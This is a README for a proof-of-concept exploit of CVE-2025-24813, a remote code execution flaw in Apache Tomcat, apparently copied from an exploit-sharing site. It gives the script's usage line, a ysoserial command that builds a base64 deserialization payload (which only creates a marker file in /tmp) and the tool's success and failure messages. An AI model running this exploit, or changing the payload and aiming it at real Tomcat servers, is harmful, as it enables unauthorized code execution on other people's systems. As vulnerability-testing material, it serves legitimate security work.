CVE-2025-24813 Apache Tomcat RCE Proof of Concept (PoC)# CVE-2025-24813 Apache Tomcat RCE PoC
PoC for CVE-2025-24813, a Remote Code Execution (RCE) vulnerability in Apache Tomcat.
---
## Usage
```
python3 CVE-2025-24813.py --url <target_url>
```
---
#### Test Payload
The code already has a base64 encoded payload generated with ysoserial (https://github.com/frohoff/ysoserial) which creates a file RCE-success in /tmp as following:
```
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/RCE-success" | base64 -w 0
```
---
## Output
* Successful Exploit:
```
[+] Exploit most likely succeeded
```
* Failed Exploit:
```
[-] Exploit failed with status code: {status_code}, instead of 500,409
```
登录后查看神龙缓存的 POC 文件快照
登录查看